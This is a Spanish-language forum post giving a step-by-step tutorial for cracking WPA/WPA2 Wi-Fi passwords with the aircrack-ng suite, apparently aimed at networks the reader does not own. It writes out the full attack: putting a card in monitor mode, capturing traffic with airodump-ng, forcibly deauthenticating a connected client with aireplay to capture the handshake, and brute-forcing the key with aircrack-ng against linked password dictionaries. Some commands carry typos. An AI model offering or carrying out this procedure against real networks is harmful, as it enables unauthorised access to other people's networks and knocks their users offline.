Manual para claves WPA y WPA2

Bueno, con esto pretendo completar el post aterior, (http://www.portalnet.cl/comunidad/showthread.php?t=257953), en esta ocasión con las claves WPA y WPA2.

Dejo en claro que el procedimiento es bastante más complicado, ya que es necesario un diccionario (que lo incluyo), el cual contiene muchísimas posibles claves, digamos las que mas se repiten en general, para que aircrack vaya comprobando la que coincide según la captura que hemos hecho.

Además, hay qye decir que es un requisito obligatorio que la señal wifi tenga un cliente conectado, esto es que bajo la señal, aparezca otra, con su MAC y que esté recibiendo datas, ¿por qué? pues porque lo que necesitamos en el Handshake ("apretón de manos"), que es cuando el cliente se asocia al AP (punto de acceso, la señal wifi que recibimos). Cuando ese cliente se asocia, nosotros capturamos los datos que serán necesarios para obtener la reciada clave.


Manos a la obra:


Los primeros pasos son los mismos que para una clave WEP
es decir.

1. Tarjeta en modo monitor:
comando: airmon-ng start rausb0 (recuerden que rausb0 es el nombre de la interfase, de mi tarjeta)

2. búsqueda de señales
comando: airodump-nga rausb0

3. Selección y nombre al archivo de captura
comando: airodump-ng --bssid "numero de MAC" -w peowifi -c 1

recuerden que -w es el nombre que le darán al archivo de captura y -c es el canal en donde esta la señal.



Ahi tendrán corriendo el airodump capturando todo lo que pille de la señal, deberia aparecen abajo el cliente que esta conectado a esa señal, copiamos su MAC que nos servirá para capturar el handshake, que se obtiene haciendo que el cliente se desauntentifique y tenga que volver a hacerlo, para eso el comando que viene es.

aireplay -0 5 -a (MAC de la señal) -c (mac del cliente) rausb0

el número 5 indica que 5 veces mandaremos la orden para que se desautentifique, ese número puede variar, como quieran.

cuando obtengan el handshake, en la ventana del airodump les aparecerá en la parte superior derecha.

si es así nada más ejecuten aircrack:

aircrack-ng diccionario.lst peowifi-01.cap

el diccionario se los doy yo, es una opción, les recomiendo que lo pongan dentro de la carpeta "Personal", para que asi al esatr en "ROOT" no tengan que poner la ruta en el comando, sólo el nombre.

aquí el diccionario de Jhon the Ripper

BAJA!!!



También incluyo el megadiccionario jejeje, pesa 150 mb, y descomprimido alcanza los 2 gigas, es de los mejores, pero para que vean que esto tiene sus comlicaciones y sus demoras

BAJA

finalmente, si tienen el handshake, sólo queda esperar, aircrack buscará, buscará, buscará, y en algún momento encontrará.


cualquier duda, no duden de nuevo y me preguntan.

saludos

 

wifiway, backtrack, wifislax...

teniendo la suite aircrack, anda...